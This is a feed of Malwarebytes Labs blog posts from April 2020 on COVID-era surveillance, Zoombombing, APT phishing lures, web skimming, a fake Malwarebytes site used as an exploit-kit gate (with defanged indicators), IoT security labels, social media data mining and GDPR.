According to an NSA Inspector General’s working draft report, President Bush’s authorization was titled “Authorization for specified electronic surveillance activities during a limited period to detect and prevent acts of terrorism within the United States.”

In 2006, the described “limited period” powers continued, as Attorney General Alberto Gonzalez argued before a secretive court that the court should retroactively legalize what the NSA had been doing for five years—collecting the phone call metadata of nearly every American, potentially revealing the numbers we called, the frequency we dialed them, and for how long we spoke. The court later approved the request.

The Attorney General’s arguments partially cited a separate law passed by Congress in 2001 that introduced a new surveillance authority for the NSA titled Section 215, which allows for the collection of “call detail records,” which are logs of phone calls, but not phone call content. Though Section 215 received significant reforms in 2015, it lingers today. Only recently has the public learned about collection failures under its authority.

In 2018, the NSA erased hundreds of millions of call and text detail records collected under Section 215 because the NSA could not reconcile their collection with the actual requirements of the law. In February, the public also learned that, despite collecting countless records across four years, only twice did the NSA uncover information that the FBI did not already have. Of those two occasions, only once did the information lead to an investigation.

Complicating the matter is the fact that the NSA shut down the call detail record program in the summer of 2019, but the program’s legal authority remains in limbo, as the Senate approved a 77-day extension in mid-March, but the House of Representatives is not scheduled to return to Congress until early May.

If this sounds frustrating, it is, and Senators and Representatives on both sides have increasingly questioned these surveillance powers.

Remember, this is how difficult it is to dismantle a surveillance machine with proven failures. We doubt it will be any easier to dismantle whatever regime the government installs to fight coronavirus.

Separate from our recent history of over-extended surveillance is the matter of whether data collection actually works at tracking and limiting coronavirus.

So far, results range from unclear to mixed.

The problems with location and proximity tracking

In 2014, government officials, technologists, and humanitarian groups installed large data collection regimes to track and limit the spread of the Ebola outbreak in West Africa.

Harvard’s School of Public Health used cell phone “pings” to chart rough estimates of callers’ locations based on the cell towers they connected to when making calls. The US Centers for Disease Control and Prevention similarly looked at cell towers which received high numbers of emergency phone calls to determine whether an outbreak was occurring in near real-time.

But according to Sean McDonald of the Berkman Klein Center for Internet and Society at Harvard University, little evidence exists to show whether location tracking helps prevent the spread of illnesses at all.

In a foreword to his 2016 paper “Ebola: A big data disaster,” McDonald analyzed South Korea’s 2014 response to Middle East Respiratory Syndrome (MERS), a separate coronavirus. To limit the spread, the South Korean government grabbed individuals’ information from the country’s mobile phone providers and implemented a quarantine on more than 17,000 people based on their locations and the probabilities of infection.

But the South Korean government never opened up about how it used citizens’ data, McDonald wrote.

“What we don’t know is whether that seizure of information resulted in a public good,” McDonald wrote. “Quite the opposite, there is limited evidence to suggest that migration or location information is a useful predictor of the spread of MERS at all.”

Further, recent efforts to provide contact tracing through Bluetooth connectivity—which is notthe same as location tracking—have not been tested on a large enough scale to prove effective.

According to a mid-March report from The Economist, just 13 percent of Singapore’s population had installed the country’s contact tracing app, TraceTogether. The low number looks worse when gauging the success in fighting coronavirus.

According to The Verge, if Americans installed a Bluetooth contact tracing app at the same rate Singaporeans, the likelihood of being notified because a chance encounter with another app-user would be just 1.44 percent.  

Worse, according to Dr. Farzad Mostashari, former national coordinator for health information technology at the Department of Health and Human Services, Bluetooth contact tracing could create many false positives. As he told The Verge:

“If I am in the wide open, my Bluetooth and your Bluetooth might ping each other even if you’re much more than six feet away. You could be through the wall from me in an apartment, and it could ping that we’re having a proximity event. You could be a on a different floor of the building and it could ping.”

This does not mean Bluetooth contact tracing is a bad idea, but it isn’t the silver bullet some imagine. Until we even know if location tracking works, we might assume the same.

Stay safe

Today is exhausting, and, sadly, tomorrow will be, too. We don’t have the answers to bring things back to normal. We don’t know if those answers exist.

What we do know is that, understandably, now is a time of fear. That is normal. That is human.

But we should avoid letting fear dictate decisions with such significance as this. In the past, mass surveillance has grown unwieldy, lasted longer than planned, and proved ineffective. Today, it is being driven by opportunistic private actors who we should not trust as the sole gatekeepers to expanded government powers.

We have no proof that mass surveillance alone will solve this crisis. Only fear lets us believe it will.

The post Mass surveillance alone will not save us from coronavirus appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Keep Zoombombing cybercriminals from dropping a load on your meetings

Malwarebytes - Tue, 04/14/2020 - 15:00

While shelter in place has left many companies struggling to stay in business during the COVID-19 epidemic, one company in particular has seen its fortunes rise dramatically. Zoom, the US-based maker of teleconferencing software, has become the web conference tool of choice for employees working from home (WFH), friends coming together for virtual happy hour, and families trying to stay connected. Since March 15, Zoom has occupied the top spot on Apple’s App Store. Only one week prior, Zoom was the 103rd-most popular app. 

Even late-night talk show hosts have jumped on the Zoom bandwagon, with Samantha Bee, Stephen Colbert, Jimmy Fallon, and Jimmy Kimmel using a combination of Zoom and cellphone video to produce their respective shows from home. 

In an incredibly zeitgeisty moment, everyone and their parents are Zooming. Unfortunately, opportunistic cybercriminals, hackers, and Internet trolls are Zooming, too.

What is Zoombombing?

Since the call for widespread sheltering in place, a number of security exploits have been discovered within the Zoom technology. Most notably, a technique called Zoombombing has risen in popularity, whether for pure mischief or more criminal purpose.

Zoombombing, also known as Zoom squatting, occurs when an unauthorized user joins a Zoom conference, either by guessing the Zoom meeting ID number, reusing a Zoom meeting ID from a previous meeting, or using a Zoom ID received from someone else. In the latter case, the Zoom meeting ID may have been shared with the Zoombomber by someone who was actually invited to the meeting or circulated among Zoombombers online.  

The relative ease by which Zoombombing can happen has led to a number of embarrassing and offensive episodes.

In one incident, a pornographic video appeared during a Zoom meeting hosted by a Kentucky college. During online instruction at a high school in San Diego, a racist word was typed into the classroom chat window while another bomber held up a sign that said the teacher “Hates Black People.” And in another incident, a Zoombomber drew male genitalia on screen while a doctoral candidate defended his dissertation.

Serious Zoombombing shenanigans

The Zoombombing problem has gotten so bad that the US Federal Bureau of Investigations has issued a warning.

That said, it’s the Zoombombs that no one notices that are most worrying, especially for Zoom’s business customers. Zoombombers can discreetly enter a Zoom conference and capture screenshots of confidential screenshares and record video and audio from the meeting. While it’s not likely for a Zoom participant to put up a slide with their username and password, the information gleaned from a Zoom meeting can be used in a phishing or spear phishing attack.

As of right now, there hasn’t been a publicly disclosed data breach as a result of a Zoombomb, but the notion isn’t far-fetched.

Numerous organizations and educational institutions have announced they will no longer be using Zoom. Of note, Google has banned the use of Zoom on company-owned devices in favor of their own Google Hangouts. The New York City Department of Education announced they’d no longer be using Zoom for remote learning. And Elon Musk’s SpaceX has banned Zoom, noting “significant privacy and security concerns” in a company-wide memo.

“Most Zoombombing incidents can be prevented with a little due diligence on the part of the user,” Malwarebytes Head of Security John Donovan said. “Anyone using Zoom, or any web conference software for that matter, is strongly encouraged to review their conference settings and minimize the permissions allowed for their conference attendees.”

“You can’t walk into a high school history class and start heckling the teacher. Unfortunately, the software lets people do that if you’re not careful,” he added.

For their part, Zoom has published multiple blog posts acknowledging the security issues with their software, changes the company has made to shore up security, and tips for keeping conferences private.

Set your meeting ID to generate automatically and always require a password. Keep your Zoom meetings secure

Here are our tips for keeping your Zoom meetings secure and free from Zoombombers. Keep in mind that many of these tips apply to other teleconferencing tools as well. 

  1. Generate a unique meeting ID. Using your personal ID for meetings is like having an open-door policy—anyone can pop in at any time. Granted, it’s convenient and easy to remember. However, if a Zoombomber successfully guesses your personal ID, they can drop in on your meetings whenever they want or even share your meeting ID with others.
  2. Set a password for each meeting. Even if you have a unique meeting ID, an invited participant can still share your meeting ID with someone outside your organization. Adding a password to your meeting is one more layer of security you can add to keep interlopers out.
  3. Allow signed-in users only. With this option, it won’t matter if Zoombombers have the meeting ID—even the password. This setting requires everyone to be signed in to Zoom using the email they were invited through.
  4. Use the waiting room. With the waiting room, the meeting doesn’t start until the host arrives and adds everyone to the meeting. Attendees in the waiting room can’t communicate with each other while they’re in the waiting room. This gives you one additional layer of manual verification, before anyone can join your meeting.
  5. Enable the chime when users join or leave the meeting. Besides giving you a reason to embarrass late arrivals, the chime ensures no one can join your meeting undetected. The chime is usually on by default, so you may want to check to make sure you haven’t turned it off in your settings.
  6. Lock the room once the meeting has begun. Once all expected attendees have joined, lock the meeting. It seems simple, but it’s another easy way to keep Zoombombing at bay.
  7. Limit screen sharing. Before the meeting starts, you can restrict who can share their screen to just the host. And during the meeting, you can change this setting on the fly, in case a participant ends up needing to show something.

A special note for IT administrators: As a matter of company policy, many of these Zoom settings can be set to default. You can even further lock down settings for a particular group of users with access to sensitive information (or those with a higher learning curve on cybersecurity hygiene). For more detailed information, see the Zoom Help Center.

Remember, Zoombombing isn’t just embarrassing—it’s a big security risk. Sure, the Zoombombing incidents making headlines at the moment seem to be about trolling people more than anything else, but the potential for more serious abuse exists.

No matter which web conferencing software you use, take a moment to learn its settings and make smart choices about the data you share in your meetings. Do this, and you’ll have a safe and happy socially-distanced gathering each time you sign on.

The post Keep Zoombombing cybercriminals from dropping a load on your meetings appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Lock and Code S1Ep4: coronavirus and responding to computer viruses with Akshay Bhargava

Malwarebytes - Mon, 04/13/2020 - 17:01

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Akshay Bhargava, Chief Product Officer of Malwarebytes, about the similarities between coronavirus and computer viruses. We discuss computer virus prevention, detection, and response, and the simple steps that consumers and businesses can take today to better protect themselves from a spreading cyberattack.

Tune in for all this and more on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, on Google Play Music, plus whatever preferred podcast platform you use.

We cover our own research on: Plus other cybersecurity news:

Stay safe, everyone!

The post Lock and Code S1Ep4: coronavirus and responding to computer viruses with Akshay Bhargava appeared first on Malwarebytes Labs.

Categories: Techie Feeds

APTs and COVID-19: How advanced persistent threats use the coronavirus as a lure

Malwarebytes - Thu, 04/09/2020 - 17:05

The coronavirus (COVID-19) has become a global pandemic, and this is a golden time for attackers to take advantage of our collective fear to increase the likelihood of successful attack. True to form, they’ve been doing just that: performing spam and spear phishing campaigns using coronavirus as a lure for government and non-government entities.

From late January on, several cybercriminal and state-sponsored advanced persistent threat (APT) groups have been using coronavirus-based phishing as their infection vector to gain a foothold on victim machines and launch malware attacks. Just like the spread of coronavirus itself, China was the first targeted by APT groups and as the virus spread worldwide, so did the attacks. 

In the following paper, we provide an overview of APT groups that have been using coronavirus as a lure, and we analyze their infection techniques and eventual payloads. We categorize the APT groups based on four different attack vectors used in COVID-19 campaigns: Template injection, Malicious macros, RTF exploits, and malicious LNK files.

You can view the full report on APTs using COVID-19 HERE.

Attack vectors
  • Template injection: Template injection refers to a technique in which the actors embed a script moniker in the lure document that contains a link to a malicious Office template in the XML setting. Upon opening the document, the remote template is dropped and executed. The Kimsuky and Gamaredon APTs used this technique.
  • Malicious macros: Embedding malicious macros is the most popular method used by threat groups. In this technique, a macro is embedded in the lure document that will be activated upon opening. Konni (APT37), APT36, Patchwork, Hades, TA505, TA542, Bitter, APT32 (Ocean Lotus) and Kimsuky are the actors using this technique.
  • RTF exploits: RTF is a flexible text format that allows embedding any object type within and makes RTF files vulnerable to many OLEl object-related vulnerabilities. Several Chinese threat actors use RTF files, among them the Calypso group and Winnti.
  • Malicious LNK files: An LNK file is a shortcut file used by Microsoft Windows and is considered as a Shell item type that can be executed. Mustang Panda is a Chinese threat actor that uses this technique to drop either a variant of the PlugX RAT or Cobalt Strike into victims’ machines. Higaisia is a North Korean threat group that also uses this method.

We expect that in the coming weeks and months, APT threat actors will continue to leverage this crisis to craft phishing campaigns using the techniques mentioned in the paper to compromise their targets.

The Malwarebytes Threat Intelligence Team is monitoring the threat landscape and paying particular attention to attacks trying to abuse the public’s fear around the COVID-19 crisis. Our Malwarebytes consumer and business customers are protected against these attacks, thanks to our multi-layered detection engines.

The post APTs and COVID-19: How advanced persistent threats use the coronavirus as a lure appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Online credit card skimming increased by 26 percent in March

Malwarebytes - Wed, 04/08/2020 - 16:00

Crisis events such as the current COVID-19 pandemic often lead to a change in habits that captures the attention of cybercriminals. With the confinement measures imposed in many countries, for example, online shopping has soared and along with it, credit card skimming. According to our data, web skimming increased by 26 percent in March over the previous month.

While this might not seem like a dramatic jump, digital credit card skimming was already on the rise prior to COVID-19, and this trend will likely continue into the near future.

While many merchants remain safe despite the increased volume in processed transactions, the exposure to compromised e-commerce stores is greater than ever.

Change in habits translates into additional web skimming attempts

Web skimming, also known under different terms, but made popular thanks to the ‘Magecart’ moniker, is the process of stealing customer data, including credit card information, from compromised online stores.

We actively track web skimmers so that we can protect our customers running Malwarebytes or Browser Guard (the browser extension) when they shop online.

The stats presented below exclude any telemetry from our Browser Guard extension and reflect a portion of the overall web skimming landscape, per our own visibility. For instance, server-side skimmers will go unaccounted for, unless the merchant site itself has been identified as compromised and is blacklisted.

One trend we notice is how the number of skimming blocks is at its highest on Mondays (which happens to be the busiest day for online shopping), lowering down in the second half of the week and being at its lowest point on week-ends.

The second observation is how the number of web skimming blocks increased moderately from January to February (2.5%) but then started to go up from February to March (26%). While this is still a moderate increase, we believe it marks a trend that will be more apparent in the coming months.

The final chart shows that we record the most skimming attempts in the US, followed by Australia and Canada. This trend coincides with the quarantine measures that began being rolled out in mid March.

Minimizing risks: a shared responsibility

As we see with other threats, there isn’t one answer to mitigate web skimming. In fact, it can be fought from many different sides starting with online merchants, the security community and shoppers themselves.

A great number of merchants do not keep their platforms up to date and also fail to respond to security disclosures. Often times, the last recourse to report a breach is to go public and hope that the media attention will bear fruit.

Many security vendors actively track web skimmers and add protection capabilities into their products. This is the case with Malwarebytes, and web protection is available in both our desktop product and browser extension. Sharing our findings and attempting to disrupt skimming infrastructure is effective at tacking the problem at scale, rather than on an individual (per site) basis.

Shopping online is convenient but not risk-free. Ultimately, users are the ones who can make savvy choices and avoid many pitfalls. Here are some recommendations:

  • Limit the number of times you have to manually enter your credit card data. Rely on platforms where that information is already stored in your account or use one-time payment options.
  • Check if the online store displays properly in your browser, without any errors or certain red flags indicating that it has been neglected.
  • Do not take trust seals or other indicators of confidence at face value. Because a site displays a logo saying it’s 100% safe does not mean it actually is.
  • If you are unsure about a site, you can use certain tools to scan it for malware or to see if it’s already on a blacklist.
  • More advanced users may want to examine a site’s source code using Developer Tools for instance, which as a side effect may turn off a skimmer noticing it is being checked.

We expect web skimming activity to keep on an upward trend in the coming months as the online shopping habits forged during this pandemic continue on well beyond. For more tips please check out Important tips for safe online shopping post COVID-19.

The post Online credit card skimming increased by 26 percent in March appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Copycat criminals abuse Malwarebytes brand in malvertising campaign

Malwarebytes - Tue, 04/07/2020 - 18:27

While exploit kit activity has been fairly quiet for some time now, we recently discovered a threat actor creating a copycat—fake—Malwarebytes website that was used as a gate to the Fallout EK, which distributes the Raccoon stealer.

The few malvertising campaigns that remain are often found on second- and third-tier adult sites, leading to the Fallout or RIG exploit kits, as a majority of threat actors have moved on to other distribution vectors. However, we believe this faux Malwarebytes malvertising campaign could be payback for our continued work with ad networks to track, report, and dismantle such attacks.

In this blog, we break down the attack and possible motives.

Stolen template includes malicious code

A few days ago, we were alerted about a copycat domain name that abused our brand. The domain malwarebytes-free[.]com was registered on March 29 via REGISTRAR OF DOMAIN NAMES REG.RU LLC and is currently hosted in Russia at 173.192.139[.]27.

Examining the source code, we can confirm that someone stole the content from our original site but added something extra.

A JavaScript snippet checks which kind of browser you are running, and if it happens to be Internet Explorer, you are redirected to a malicious URL belonging to the Fallout exploit kit.

Infection chain for copycat campaign

This fake Malwarebytes site is actively used as a gate in a malvertising campaign via the PopCash ad network, which we contacted to report the malicious advertiser.

Fallout EK is one of the newer (or perhaps last) exploit kits that is still active in the wild. In this sequence, it is used to launch the Raccoon stealer onto victim machines.

A motive behind decoy pages

The threat actor behind this campaign may be tied to others we’ve been tracking for a few months. They have used similar fake copycat templates before that act as gates. For example, this fake Cloudflare domain (popcashexhange[.]xyz) also plays on the PopCash name:

There is no question that security companies working with providers and ad networks are hindering efforts and money spent by cybercriminals. We’re not sure if we should take this plagiarism as a compliment or not.

If you are an existing Malwarebytes user, you were already safe from this malvertising campaign, thanks to our anti-exploit protection.

Copycat tactics have long been used by scammers and other criminals to dupe online and offline victims. As always, it is better to double-check the identity of the website you are visiting and, if in doubt, access it directly either by punching in the URL or via bookmarked page/tab.

Indicators of compromise

Fake Malwarebytes site

malwarebytes-free[.]com
31.31.198[.]161

Fallout EK

134.209.86[.]129

Raccoon Stealer

78a90f2efa2fdd54e3e1ed54ee9a18f1b91d4ad9faedabd50ec3a8bb7aa5e330
34.89.159[.]33

The post Copycat criminals abuse Malwarebytes brand in malvertising campaign appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Cybersecurity labeling scheme introduced to help users choose safe IoT devices

Malwarebytes - Tue, 04/07/2020 - 15:52

The Internet of Things (IoT) is a term used to describe a wide variety of devices that are connected to the Internet to improve user experience. For example, a doorbell becomes part of the IoT when it connects to the Internet and allows users to see visitors outside their door.

But the way in which some of these IoT devices connect invites serious security and privacy concerns. This has led to pleas for laws and regulation in the production and marketing of IoT devices, including increased security features and better visibility into the security of those features.

Our loyal readers have seen our regular complaints about the built-in security of IoT devices and know how concerned we are about products that are designed to optimize functionality and cost over security. Many manufacturers expect consumers to care more about ease-of-use than about security.

But while this may be true for many consumers, the apparent indifference can also be explained by a lack of comparable options. If consumers were given the choice between a device that’s cheap, easy to use, and insecure and a device that’s a bit more costly but keeps users protected—our bet is there’d be a good chunk of consumers who’d select the more secure option.

While some states and countries do have laws demanding manufacturers produce “safe” products, this doesn’t help consumers in making a choice. At best, it limits their choice as some unsafe products will not make it to the market. To help users make an informed decision, some countries have decided to introduce a new cybersecurity labeling scheme (CLS) that provides consumers with information about the security of connected smart devices.

Countries introducing a cybersecurity labeling scheme

In November 2019, Finland became the first country in Europe to grant information security certificates to devices that passed the required tests. Their reasoning was that the security level of devices in the market varies a lot, and there’s no easy way for consumers to know which products are safe and which are not. As a service to the public, a website was launched to make it easy to find information about the devices that have been awarded the label.

On January 27, 2020, the UK’s Digital Minister Matt Warman announced a new law to protect millions of IoT users from the threat of cyberattack. The plan is to make sure that all consumer smart devices sold in the UK adhere to rigorous security requirements for the Internet of Things (IoT).

Shortly after the UK, the Cyber Security Agency of Singapore (CSA) announced plans to introduce a new Cybersecurity Labeling Scheme (CLS) later this year to help consumers make informed purchasing choices about network-connected smart devices.

As part of the initiative, CLS will address the security of IoT devices, a growing area of concern. The CLS, which is a first for the Asia-Pacific region, will first be introduced to two product types: WiFi routers and smart home hubs.

Recommended reading: 8 ways to improve security on smart home devices

The goals of a cybersecurity labeling scheme

The cybersecurity labeling scheme will be aligned to globally-accepted security standards for consumer Internet of Things products. It will mean that robust security standards will be introduced from the design stage and not bolted on as an afterthought.

The scheme proposes that such devices should carry a security label to help consumers navigate the market and know which devices to trust, and to encourage manufacturers to improve security. The idea is that—similar to how Bluetooth and WiFi labels help consumers feel confident their products will work with wireless communication protocols—a security label will instill confidence in consumers that their device was built according to security standards.

The Singapore CLS is a first-of-its-kind cybersecurity rating system in the APAC region, and is primarily aimed at helping the consumers make informed choices. The rating of a product will be decided on a series of assessments and tests including, but not limited to:

  • Meeting basic security requirements (e.g. unique default passwords)
  • Adherence to software and hardware security-by-design principles
  • Common software security vulnerabilities should be absent
  • Resistant to basic penetration testing activity

The same is true for the law that is under preparation for the UK. Their primary security requirements are:

  • All consumer Internet-connected device passwords must be unique and not resettable to any universal factory setting.
  • Manufacturers of consumer IoT devices must provide a public point of contact so anyone can report a vulnerability, and it will be acted on in a timely manner.
  • Manufacturers of consumer IoT devices must explicitly state the minimum length of time for which the device will receive security updates at the point of sale, either in store or online.

As you can see in both cases, the main worry was the omnipresence of default passwords that were the same for a whole series of devices. And on top of that, users were not clearly informed that they needed to change the default password, and often it was hard to change them for the average user.

Optimizing the CLS

We applaud the efforts made by governments to improve on the overall security of IoT devices, but there are some improvements we would like to suggest.

  • The Finnish site is available in Finnish and Swedish. For an outsider, it is hard to make out which products are approved and why. An English version would be a big step forward.
  • The laws in the UK and California are a good start but could have been more restrictive. And they don’t inform a customer about the security of a device when they are looking to buy from a web shop that might be abroad.
  • The Singapore CLS for now focuses on routers and smart home hubs because they consider them the gateways to the rest of the household. While this makes sense, it is a limited scope.

What all these regulations have in common is that they only inform the customer whether a device has passed muster in a certain state or country. Certainly, we can come up with a global scheme that gives customers a security level between “don’t buy this” and “very safe” like we have for energy efficiency in the EU.

EU energy labels

But let’s rejoice for now that these governments are making a start in a much-needed effort to improve devices and inform customers. Let us hope that the various security labeling schemes will help consumers make an informed choice and drive manufacturers to focus more on security. And that other governments will follow their examples.

Stay safe, everyone!

The post Cybersecurity labeling scheme introduced to help users choose safe IoT devices appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (March 30 – April 5)

Malwarebytes - Mon, 04/06/2020 - 17:05

Last week on Malwarebytes Labs, we offered readers tips for safe online shopping now that cybercriminals are ramping up Internet-based attacks, showed the impact that GDPR has around the world, and helped users understand how social media platforms mine their personal data. We also hosted our bi-weekly podcast, Lock and Code, with guest Adam Kujawa, who discussed the state of data privacy today.

Other cybersecurity news:
  • Two zero-day vulnerabilities were used by two different groups to infiltrate DrayTek Vigor enterprise routers and switch devices. (Source: SCMagazine)
  • An organisation, Cyber Volunteers 19 (CV19), is being set up to help people volunteer their IT security expertise and services to healthcare. (Source: Graham Cluley)
  • Organizations globally are exposing their networks to risk by using insecure RDP and VPN to go remote due to COVID-19. (Source: Hot for Security)
  • Houseparty is offering a $1 million reward to anyone providing proof it was the victim of a paid commercial smear campaign. (Source: TechSpot)
  • The Marriott hotel chain announced that it had suffered another data breach exposing 5.2 million guest records. (Source: SiliconRepublic)
  • Online threats have risen by as much as six times their usual levels over the past four weeks as the COVID-19 pandemic provides new ballast for cyberattacks. (Source: InfoSecurity)
  • The Internet is rife with online communities where users can go and share Zoom conference codes to organize Zoom-bombing raids. (Source: ZDNet)
  • After being criticized about several problems, Zoom itself decided to dedicate all the resources needed to better identify, address, and fix issues proactively. (Source: Zoom Blog)

Stay safe everyone!

The post A week in security (March 30 – April 5) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How social media platforms mine personal data for profit

Malwarebytes - Fri, 04/03/2020 - 18:42

It’s almost impossible not to rely on social networks in some way, whether for personal reasons or business. Sites such as LinkedIn continue to blur the line, increasing the amount of social function over time with features and services resembling less formal sites, such as Facebook. Can anyone imagine not relying on, of all things, Twitter to catch up on breaking coronavirus news around the world instantly? The trade off is your data, and how they profit from it.

Like it or not—and it’s entirely possibly it’s a big slab of “not”—these services are here to stay, and we may be “forced” to keep using them. Some of the privacy concerns that lead people to say, “Just stop using them” are well founded. The reality, however, is not quite so straightforward.

For example, in many remote regions, Facebook or Twitter might be the only free Internet access people have. And with pockets of restriction on free press, social media often represents the only outlet for “truth” for some users. There are some areas where people can receive unlimited Facebook access when they top up their mobiles. If they’re working, they’ll almost always use Facebook Messenger or another social media chat tool to stay in touch rather than drain their SMS allowance.

Many of us can afford to walk away from these services; but just as many of us simply can’t consider it when there’s nothing else to take its place.

Mining for data (money) has never been so profitable.

But how did this come to be? In the early days of Facebook, it was hard to envision the platform being used to spread disinformation, assist in genocide, or sell user data to third-parties. We walk users through the social media business model and show how the inevitable happens: when a product is free, the commodity is you and your data.

Setting up social media shop

Often, Venture Capital backing is how a social network springs into life. This is where VC firms invest lots of money for promising-looking services/technology with the expectation they’ll make big money and gain a return on investment in the form of ownership stakes. When the company is bought out or goes public, it’s massive sacks of cash for everybody. (Well, that’s the dream. The reality is usually quite a bit more complicated).

It’s not exactly common for these high-risk gambles to pay off, and what often happens is the company never quite pops. They underperform, or key staff leave, and they expand a little too rapidly with the knock-on effect that the CEO suddenly has this massive service with millions of users and no sensible way to turn that user base into profit (and no way to retain order on a service rife with chaos).

At that point, they either muddle along, or they look to profit in other ways. That “other way” is almost always via user data. I mean, it’s all there, so why not? Here are just some of the methods social networks deploy to turn bums on seats into massive piles of cash.

Advertising on social media

This is the most obvious one, and a primary driver for online revenue for many a year. Social media platforms tend to benefit in a way other more traditional publishers cannot, and revenue streams appear to be quite healthy in terms of user-revenue generation.

Advertising is a straight-forward way for social media networks to not only make money from the data they’ve collected, but also create chains where external parties potentially dip into the same pool, too.

At its most basic, platforms can offer ad space to advertisers. Unlike traditional publishing, social media ads can be tailored to personalized data the social network sees you searching for, talking about, or liking daily. If you thought hitting “like” (or its equivalent) on a portal was simply a helpful thumbs up in the general direction of someone providing content, think again. It’s quite likely feeding data into the big pot of “These are the ads we should show this person.” 

Not only is everything you punch into the social network (and your browser) up for grabs, but everything your colleagues and associates do too, tying you up in a neat little bow of social media profiling. All of it can then be mined to make associations and estimations, which will also feed back to ad units and, ultimately, profit.

Guesstimates are based on the interests of you, your family, your friends, and your friends’ friends, plus other demographic-specific clues, such as your job title, pictures of your home, travel experiences, cars, and marriage status. Likely all of these data points help the social network neatly estimate your income, another way to figure out which specific adverts to send your way.

After all, if they send you the wrong ads, they lose. If you’re not clicking through and popping a promo page, the advertisers aren’t really winning. All that ad investment is essentially going to waste unless you’re compelled to make use of it in some way.

Even selling your data to advertisers or other marketing firms could be on the table. Depending on terms of service, it’s entirely possible the social platforms you use can anonymise their treasure trove and sell it for top dollar to third parties. Even in cases where the data isn’t sold, simply having it out there is always a bit risky.

There have been many unrelated, non-social media instances where it turned out supposedly anonymous data, wasn’t. There are always people who can come along afterwards and piece it all together, and they don’t have to be Sherlock Holmes to do it. All this before you consider social media sites/platforms with social components aren’t immune to the perils of theft, leakage, and data scraping.

As any cursory glance of a security news source will tell you, there’s an awful lot of rogue advertisers out there to offset the perfectly legitimate ones. Whether by purchase or stumbling upon data leaked online, scammers are happy to take social media data and tie it up in email/phone scams and additional fake promos. At that point, even data generated through theoretically legitimate means is being (mis)used in some way by unscrupulous individuals, which only harms the ad industry further.

Apps and ads

Moving from desktop to mobile is a smart move for social networks, and if they’re able to have you install an app, then so much the better (for them). Depending on the mobile platform, they may be able to glean additional information about sites, apps, services, and preferred functionalities, which wouldn’t necessarily be available if you simply used a mobile web browser.

If you browse for any length of time on a mobile device, you’ll almost certainly be familiar with endless pop-ups and push notifications telling you how much cooler and awesome the app version of site X or Y will be. You may also have experienced the nagging sensation that websites seem to degrade in functionality over time on mobile browsers.

Suddenly, the UI is a little worse. The text is tiny. Somehow, you can no longer find previously overt menu options. Certain types of content no longer display correctly or easily, even when it’s something as basic as a jpeg. Did the “Do you want to view this in the app?” popup reverse the positions of the “Yes” and “No” buttons from the last time you saw it? Are they trying to trick you into clicking the wrong thing? It’s hard to remember, isn’t it?

A cynic would say this is all par for the course, but this is something you’ve almost certainly experienced when trying to do anything in social land on a mobile minus an app.

Once you’re locked into said app, a brave new world appears in terms of intimately-detailed data collection and a huge selection of adverts to choose from. Some of them may lead to sponsored affiliate links, opening the data harvesting net still further, or lead to additional third-party downloads. Some of these may be on official platform stores, while others may sit on unofficial third-party websites with all the implied risk such a thing carries.

Even the setup of how apps work on the website proper can drive revenue. Facebook caught some heat back in 2008 for their $375USD developer fee. Simply having a mass of developers making apps for the platform—whether verified or not—generates data that a social network platform can make use of, then tie it back to their users.

It’s all your data, wheeling around in a tumble drier of analytics.

Payment for access/features

Gating access to websites behind paywalls is not particularly popular for the general public. Therefore, most sites with a social networking component will usually charge only for additional services, and those services might not even be directly related to the social networking bit.

LinkedIn is a great example of this: the social networking part is there for anybody to use because it makes all those hilariously bad road warrior lifestyle posts incredibly sticky, and humorous replies are often the way people first land on a profile proper. However, what you’re paying for is increased core functionality unrelated to the “Is this even real?” comedy posts elsewhere.

In social networking land, a non-payment gated approach was required for certain platforms. Orkut, for example, required a login to access any content. Some of the thinking there was that a gated community could keep the bad things out. In reality, when data theft worms started to spread, it just meant the attacks were contained within the walls and hit the gated communities with full force.

The knock-on effect of this was security researchers’ ability to analyse and tackle these threats was delayed because many of these services were either niche or specific to certain regions only. As a result, finding out about these attacks was often at the mercy of simply being informed by random people that “X was happening over in Y.”

These days, access is much more granular, and it’s up to users to display what they want, with additional content requiring you to be logged in to view.

Counting the cost

Of the three approaches listed above, payment/gating is one of the least popular techniques to encourage a revenue stream. Straight up traditional advertising isn’t as fancy as app/site/service integration, but it’s something pretty much anybody can use, which is handy for devs without the mobile know-how or funds available to help make it happen.

Even so, nothing quite compares to the flexibility provided by mobile apps, integrated advertising, and the potential for additional third-party installs. With the added boost to sticky installs via the pulling power of social media influencers, it’s possibly never been harder to resist clicking install for key demographics.

The most important question, then, turns out to be one of the most common: What are you getting in return for loading an app onto your phone?

It’s always been true for apps generally, and it’ll continue to be a key factor in social media mobile data mining for the foreseeable future. “You are the product” might be a bit long in the tooth at this point, but where social media is concerned, it’s absolutely accurate. How could the billions of people worldwide creating the entirety of the content posted be anything else?

The post How social media platforms mine personal data for profit appeared first on Malwarebytes Labs.

Categories: Techie Feeds

GDPR: An impact around the world

Malwarebytes - Wed, 04/01/2020 - 19:19

A little more than one month after the European Union enacted the General Data Protection Regulation (GDPR) to extend new data privacy rights to its people, the governor of California signed a separate, sweeping data protection law that borrowed several ideas from GDPR, sparking a torch in a legislative data privacy trend that has now spanned at least 10 countries.

In Chile, lawmakers are updating decades-old legislation to guarantee that their Constitutional data protections include the rights to request, modify, and delete personal data. In Argentina, legislators are updating a set of data privacy protections that already granted the country a “whitelist” status, allowing it to more seamlessly transfer data to the European Union. In Brazil, the president signed a data protection law that comes into effect this August that creates a GDPR-like framework, setting up rules for data “controllers” and “owners,” and installing a data protection authority to regulate and review potential violations.

Beyond South America, India is mulling a new law that would restrict how international companies use personal data, but the law includes a massive loophole for government agencies. Canada passed its first, national data breach notification law, and in the United States, multiple state and federal bills have borrowed liberally from GDPR’s ideas to extend the rights of data access, deletion, and portability to the public.

GDPR came into effect two years ago, and its impact is clear: Data privacy is the law of the land, and many lands look to GDPR for inspiration.

Amy de La Lama, a partner at Baker McKenzie who focuses her legal practice on global privacy, data security, and cybersecurity, said the world is undergoing major shifts in data privacy, and that GDPR helped spur much of the current conversations.

